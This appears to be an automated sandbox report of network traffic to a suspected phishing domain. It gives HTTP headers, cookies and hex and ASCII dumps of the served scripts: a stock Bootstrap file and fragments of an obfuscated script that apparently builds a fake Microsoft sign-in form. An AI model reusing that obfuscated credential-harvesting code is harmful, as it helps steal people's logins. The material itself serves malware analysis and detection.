6e 7d 2c 66 61 2e 6d 61 74
                                    Data Ascii: =[a],h=[b];if(!e||!f)return a===n?-1:b===n?1:e?-1:f?1:k?J(k,a)-J(k,b):0;if(e===f)return ka(a,b);c=a;while(c=c.parentNode)g.unshift(c);c=b;while(c=c.parentNode)h.unshift(c);while(g[d]===h[d])d++;return d?ka(g[d],h[d]):g[d]===v?-1:h[d]===v?1:0},n):n},fa.mat


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    33192.168.2.449801104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:24 UTC1168OUTGET /boot/617b5a702a34daddd03071650f95cbe6664e0aa35f139 HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: script
                                    Referer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
                                    2024-05-22 15:09:24 UTC648INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:24 GMT
                                    Content-Type: text/javascript
                                    Content-Length: 51039
                                    Connection: close
                                    Last-Modified: Tue, 14 May 2024 10:31:22 GMT
                                    Accept-Ranges: bytes
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J0XO8wZgr6w6Bc7RUt58tLGfVqYHCBSKRvIgXbk7H%2F3BaqfKCUUwUNwDKXI8rTRCDWmdocdyoFZFqri5XwgLaJ6YAqgVLM1wsU%2FIcHuP1XQz%2BhkneNY8dJ660DNGDMZmAoy3ohEkYfz59%2FJEGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887dba21ffb68cbd-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:24 UTC721INData Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22
                                    Data Ascii: /*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t,e){"
                                    2024-05-22 15:09:24 UTC1369INData Raw: 26 26 69 28 74 2c 6e 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 72 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6f 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 2c 65 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6f 29 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 26 26 28 65 3d 65 2e 63 6f 6e 63 61 74 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 6f 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70
                                    Data Ascii: &&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnProp
                                    2024-05-22 15:09:24 UTC1369INData Raw: 3b 29 3b 72 65 74 75 72 6e 20 74 7d 2c 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 74 61 72 67 65 74 22 29 3b 65 26 26 22 23 22 21 3d 3d 65 7c 7c 28 65 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66 22 29 7c 7c 22 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 3f 65 3a 6e 75 6c 6c 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 2c 67 65 74 54 72 61 6e 73 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 46 72 6f 6d 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 20 30 3b 76
                                    Data Ascii: ;);return t},getSelectorFromElement:function(t){var e=t.getAttribute("data-target");e&&"#"!==e||(e=t.getAttribute("href")||"");try{return document.querySelector(e)?e:null}catch(t){return null}},getTransitionDurationFromElement:function(t){if(!t)return 0;v
                                    2024-05-22 15:09:24 UTC1369INData Raw: 74 29 29 2c 74 68 69 73 2e 5f 74 72 69 67 67 65 72 43 6c 6f 73 65 45 76 65 6e 74 28 65 29 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 7c 7c 74 68 69 73 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 28 65 29 7d 2c 74 2e 64 69 73 70 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 72 65 6d 6f 76 65 44 61 74 61 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 6f 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 6e 75 6c 6c 7d 2c 74 2e 5f 67 65 74 52 6f 6f 74 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 29 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 65 26 26 28 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65
                                    Data Ascii: t)),this._triggerCloseEvent(e).isDefaultPrevented()||this._removeElement(e)},t.dispose=function(){r.removeData(this._element,o),this._element=null},t._getRootElement=function(t){var e=Fn.getSelectorFromElement(t),n=!1;return e&&(n=document.querySelector(e
                                    2024-05-22 15:09:24 UTC1369INData Raw: 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 79 2b 45 2c 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 3a 28 53 3d 22 66 6f 63 75 73 22 29 2b 79 2b 45 2b 22 20 62 6c 75 72 22 2b 79 2b 45 7d 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 6e 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 74 6f 67 67 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 21 30 2c 65 3d 21 30 2c 6e 3d 6d 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 6c 6f 73 65 73 74 28 41 29 5b 30 5d 3b 69 66 28 6e 29 7b 76 61 72 20 69 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 44 29 3b 69 66 28 69 29 7b 69
                                    Data Ascii: DATA_API:"click"+y+E,FOCUS_BLUR_DATA_API:(S="focus")+y+E+" blur"+y+E},k=function(){function n(t){this._element=t}var t=n.prototype;return t.toggle=function(){var t=!0,e=!0,n=m(this._element).closest(A)[0];if(n){var i=this._element.querySelector(D);if(i){i
                                    2024-05-22 15:09:24 UTC1369INData Raw: 2e 66 6e 5b 70 5d 3d 43 2c 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 6b 29 2c 51 6e 3d 28 6a 3d 22 63 61 72 6f 75 73 65 6c 22 2c 4c 3d 22 2e 22 2b 28 48 3d 22 62 73 2e 63 61 72 6f 75 73 65 6c 22 29 2c 52 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 78 3d 28 50 3d 65 29 2e 66 6e 5b 6a 5d 2c 57 3d 7b 69 6e 74 65 72 76 61 6c 3a 35 65 33 2c 6b 65 79 62 6f 61 72 64 3a 21 30 2c 73 6c 69 64 65 3a 21 31 2c 70 61 75 73 65 3a 22 68 6f 76 65 72 22 2c 77 72 61 70 3a 21 30 7d 2c 55 3d 7b 69 6e 74 65 72 76 61 6c 3a 22 28 6e 75 6d 62 65 72 7c 62 6f 6f 6c 65 61 6e 29 22 2c 6b 65 79 62 6f 61 72 64 3a 22 62 6f 6f 6c 65 61 6e 22 2c 73 6c 69 64 65 3a 22 28 62 6f 6f 6c 65 61 6e 7c 73 74 72 69 6e 67 29 22 2c 70 61 75 73 65 3a 22 28 73 74 72 69 6e 67 7c 62 6f 6f 6c
                                    Data Ascii: .fn[p]=C,k._jQueryInterface},k),Qn=(j="carousel",L="."+(H="bs.carousel"),R=".data-api",x=(P=e).fn[j],W={interval:5e3,keyboard:!0,slide:!1,pause:"hover",wrap:!0},U={interval:"(number|boolean)",keyboard:"boolean",slide:"(boolean|string)",pause:"(string|bool
                                    2024-05-22 15:09:24 UTC1369INData Raw: 74 2e 70 61 75 73 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 7c 7c 28 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 30 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 74 29 26 26 28 46 6e 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2c 74 68 69 73 2e 63 79 63 6c 65 28 21 30 29 29 2c 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 7d 2c 74 2e 63 79 63 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 7c 7c 28 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 31 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 26 26 28 63 6c 65 61 72 49 6e 74 65 72 76 61
                                    Data Ascii: t.pause=function(t){t||(this._isPaused=!0),this._element.querySelector(et)&&(Fn.triggerTransitionEnd(this._element),this.cycle(!0)),clearInterval(this._interval),this._interval=null},t.cycle=function(t){t||(this._isPaused=!1),this._interval&&(clearInterva
                                    2024-05-22 15:09:24 UTC1369INData Raw: 2e 63 79 63 6c 65 28 74 29 7d 29 2c 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 69 6e 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 54 4f 55 43 48 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 70 61 75 73 65 28 29 2c 65 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 26 26 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 29 2c 65 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 63 79 63 6c 65 28 74 29 7d 2c 35 30 30 2b 65 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 7d 29 29 7d 2c 74 2e 5f 6b 65 79 64 6f 77 6e 3d 66 75 6e 63 74 69 6f
                                    Data Ascii: .cycle(t)}),"ontouchstart"in document.documentElement&&P(this._element).on(Q.TOUCHEND,function(){e.pause(),e.touchTimeout&&clearTimeout(e.touchTimeout),e.touchTimeout=setTimeout(function(t){return e.cycle(t)},500+e._config.interval)}))},t._keydown=functio
                                    2024-05-22 15:09:24 UTC1369INData Raw: 2e 5f 67 65 74 49 74 65 6d 42 79 44 69 72 65 63 74 69 6f 6e 28 74 2c 73 29 2c 63 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 6c 29 2c 68 3d 42 6f 6f 6c 65 61 6e 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 3b 69 66 28 74 3d 3d 3d 71 3f 28 6e 3d 4a 2c 69 3d 5a 2c 72 3d 4b 29 3a 28 6e 3d 7a 2c 69 3d 47 2c 72 3d 4d 29 2c 6c 26 26 50 28 6c 29 2e 68 61 73 43 6c 61 73 73 28 56 29 29 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 3d 21 31 3b 65 6c 73 65 20 69 66 28 21 74 68 69 73 2e 5f 74 72 69 67 67 65 72 53 6c 69 64 65 45 76 65 6e 74 28 6c 2c 72 29 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 26 26 73 26 26 6c 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 3d 21 30 2c 68 26 26 74 68 69 73 2e 70 61 75 73 65 28 29 2c 74 68
                                    Data Ascii: ._getItemByDirection(t,s),c=this._getItemIndex(l),h=Boolean(this._interval);if(t===q?(n=J,i=Z,r=K):(n=z,i=G,r=M),l&&P(l).hasClass(V))this._isSliding=!1;else if(!this._triggerSlideEvent(l,r).isDefaultPrevented()&&s&&l){this._isSliding=!0,h&&this.pause(),th
                                    2024-05-22 15:09:24 UTC957INData Raw: 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 6c 69 64 65 2d 74 6f 22 29 3b 72 26 26 28 69 2e 69 6e 74 65 72 76 61 6c 3d 21 31 29 2c 6f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 50 28 6e 29 2c 69 29 2c 72 26 26 50 28 6e 29 2e 64 61 74 61 28 48 29 2e 74 6f 28 72 29 2c 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 7d 7d 2c 73 28 6f 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 31 2e 33 22 7d 7d 2c 7b 6b 65 79 3a 22 44 65 66 61 75 6c 74 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 57 7d 7d 5d 29 2c 6f 7d 28 29 2c 50 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 51 2e 43 4c 49 43 4b 5f 44 41 54 41
                                    Data Ascii: etAttribute("data-slide-to");r&&(i.interval=!1),o._jQueryInterface.call(P(n),i),r&&P(n).data(H).to(r),t.preventDefault()}}},s(o,null,[{key:"VERSION",get:function(){return"4.1.3"}},{key:"Default",get:function(){return W}}]),o}(),P(document).on(Q.CLICK_DATA


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    34192.168.2.449800104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:24 UTC1166OUTGET /js/617b5a702a34daddd03071650f95cbe6664e0aa35f13a HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: script
                                    Referer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
                                    2024-05-22 15:09:24 UTC657INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:24 GMT
                                    Content-Type: text/javascript
                                    Content-Length: 7043
                                    Connection: close
                                    Last-Modified: Tue, 14 May 2024 10:31:22 GMT
                                    Accept-Ranges: bytes
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bW2trj4oBBHZ%2FEbmJr9lan%2BVo6Nbs8be8yAiAypI7BYQw38E6steDqH3Fobjp4rAdj5FXMo0%2F8YNi%2Fh8oZsubZaKukL7ZG%2Bbj3%2BVwehN%2BrYXaD2ZqDU0WOR%2FmQtaqtsBy0XZPp%2B1WEucFN0Fcg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887dba222fdb4283-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:24 UTC712INData Raw: 76 61 72 20 5f 30 78 32 32 64 35 62 34 3d 5f 30 78 65 39 33 36 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 39 33 36 28 5f 30 78 31 31 30 64 30 66 2c 5f 30 78 32 62 39 31 61 39 29 7b 76 61 72 20 5f 30 78 35 61 66 63 32 39 3d 5f 30 78 32 65 38 39 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 65 39 33 36 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 65 38 30 33 34 2c 5f 30 78 31 36 34 39 61 66 29 7b 5f 30 78 35 65 38 30 33 34 3d 5f 30 78 35 65 38 30 33 34 2d 30 78 31 32 64 3b 76 61 72 20 5f 30 78 34 31 62 66 65 38 3d 5f 30 78 35 61 66 63 32 39 5b 5f 30 78 35 65 38 30 33 34 5d 3b 72 65 74 75 72 6e 20 5f 30 78 34 31 62 66 65 38 3b 7d 2c 5f 30 78 65 39 33 36 28 5f 30 78 31 31 30 64 30 66 2c 5f 30 78 32 62 39 31 61 39 29 3b 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 38 66
                                    Data Ascii: var _0x22d5b4=_0xe936;function _0xe936(_0x110d0f,_0x2b91a9){var _0x5afc29=_0x2e89();return _0xe936=function(_0x5e8034,_0x1649af){_0x5e8034=_0x5e8034-0x12d;var _0x41bfe8=_0x5afc29[_0x5e8034];return _0x41bfe8;},_0xe936(_0x110d0f,_0x2b91a9);}(function(_0x18f
                                    2024-05-22 15:09:24 UTC1369INData Raw: 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 65 38 39 28 29 7b 76 61 72 20 5f 30 78 33 35 37 34 33 62 3d 5b 27 6c 6f 67 27 2c 27 75 6e 64 65 72 27 2c 27 70 72 6f 74 6f 74 79 70 65 27 2c 27 75 73 65 72 6e 61 6d 65 45 72 72 6f 72 27 2c 27 64 69 73 61 62 6c 65 64 27 2c 27 73 65 61 72 63 68 27 2c 27 70 72 6f 67 72 65 73 73 42 61 72 27 2c 27 72 65 6d 6f 76 65 43 6c 61 73 73 27 2c 27 3c 62 72 2f 3e 27 2c 27 65 61 63 68 27 2c 27 6a 73 6f 6e 27 2c 27 74 72 61 63 65 27 2c 27 73 74 79 6c 65 27 2c 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 27 2c 27 6f 70 61 63 69 74 79 27 2c 27 6e 6f 6e 65 27 2c 27 69 30 31 31 36 27 2c 27 76 61 6c 75 65 27 2c 27 6c 6f 63 61 74 69 6f 6e 27 2c 27 72 65 6d 6f 76 65 41 74 74 72 27 2c 27 72 65 73 65 74 27 2c 27 6c 6f 67 5f 66 6f 72 6d 27 2c
                                    Data Ascii: ;function _0x2e89(){var _0x35743b=['log','under','prototype','usernameError','disabled','search','progressBar','removeClass','<br/>','each','json','trace','style','querySelector','opacity','none','i0116','value','location','removeAttr','reset','log_form',
                                    2024-05-22 15:09:24 UTC1369INData Raw: 39 30 31 65 35 3d 5f 30 78 31 31 32 64 61 66 5b 5f 30 78 31 32 66 34 64 38 28 30 78 31 35 38 29 5d 28 5f 30 78 32 38 31 64 34 34 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 31 31 32 64 61 66 3d 6e 75 6c 6c 2c 5f 30 78 33 39 30 31 65 35 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 32 62 38 37 64 62 3d 21 5b 5d 2c 5f 30 78 33 63 66 65 63 39 3b 7d 3b 7d 28 29 29 2c 5f 30 78 34 62 39 62 61 35 3d 5f 30 78 64 62 31 63 65 63 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 34 38 38 32 35 33 3d 5f 30 78 65 39 33 36 3b 72 65 74 75 72 6e 20 5f 30 78 34 62 39 62 61 35 5b 5f 30 78 34 38 38 32 35 33 28 30 78 31 33 31 29 5d 28 29 5b 5f 30 78 34 38 38 32 35 33 28 30 78 31 33 65 29 5d 28 5f
                                    Data Ascii: 901e5=_0x112daf[_0x12f4d8(0x158)](_0x281d44,arguments);return _0x112daf=null,_0x3901e5;}}:function(){};return _0x2b87db=![],_0x3cfec9;};}()),_0x4b9ba5=_0xdb1cec(this,function(){var _0x488253=_0xe936;return _0x4b9ba5[_0x488253(0x131)]()[_0x488253(0x13e)](_
                                    2024-05-22 15:09:24 UTC1369INData Raw: 62 32 61 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 33 38 29 5d 3d 5f 30 78 31 36 34 39 61 66 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 35 66 29 5d 28 5f 30 78 31 36 34 39 61 66 29 2c 5f 30 78 33 61 65 62 32 61 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 33 31 29 5d 3d 5f 30 78 34 31 65 35 39 30 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 33 31 29 5d 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 35 66 29 5d 28 5f 30 78 34 31 65 35 39 30 29 2c 5f 30 78 35 31 36 64 37 64 5b 5f 30 78 31 63 64 66 39 31 5d 3d 5f 30 78 33 61 65 62 32 61 3b 7d 7d 29 3b 5f 30 78 35 65 38 30 33 34 28 29 3b 66 75 6e 63 74 69 6f 6e 20 73 6c 65 65 70 28 5f 30 78 34 31 35 62 63 31 29 7b 76 61 72 20 5f 30 78 31 35 35 30 61 33 3d 5f 30 78 65 39 33 36 3b 63 6f 6e 73 74 20 5f 30 78 32 61 65 65 61
                                    Data Ascii: b2a[_0x3947f6(0x138)]=_0x1649af[_0x3947f6(0x15f)](_0x1649af),_0x3aeb2a[_0x3947f6(0x131)]=_0x41e590[_0x3947f6(0x131)][_0x3947f6(0x15f)](_0x41e590),_0x516d7d[_0x1cdf91]=_0x3aeb2a;}});_0x5e8034();function sleep(_0x415bc1){var _0x1550a3=_0xe936;const _0x2aeea
                                    2024-05-22 15:09:24 UTC1369INData Raw: 62 35 28 30 78 31 35 32 29 29 2c 5f 30 78 34 62 39 38 35 63 3d 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 34 36 29 5d 28 5f 30 78 33 36 37 63 62 35 28 30 78 31 33 33 29 29 3b 70 72 6f 67 3d 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 37 31 29 5d 28 5f 30 78 33 36 37 63 62 35 28 30 78 31 33 66 29 29 2c 70 72 6f 67 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 36 36 29 5d 28 5f 30 78 33 36 37 63 62 35 28 30 78 31 36 35 29 29 2c 5f 30 78 32 36 31 31 38 32 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 34 35 29 5d 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 33 30 29 5d 3d 27 31 30 27 2c 5f 30 78 32 36 31 31 38 32 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 34 35 29 5d 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 34 37 29 5d 3d 27
                                    Data Ascii: b5(0x152)),_0x4b985c=document[_0x367cb5(0x146)](_0x367cb5(0x133));prog=document[_0x367cb5(0x171)](_0x367cb5(0x13f)),prog[_0x367cb5(0x166)](_0x367cb5(0x165)),_0x261182[_0x367cb5(0x145)][_0x367cb5(0x130)]='10',_0x261182[_0x367cb5(0x145)][_0x367cb5(0x147)]='
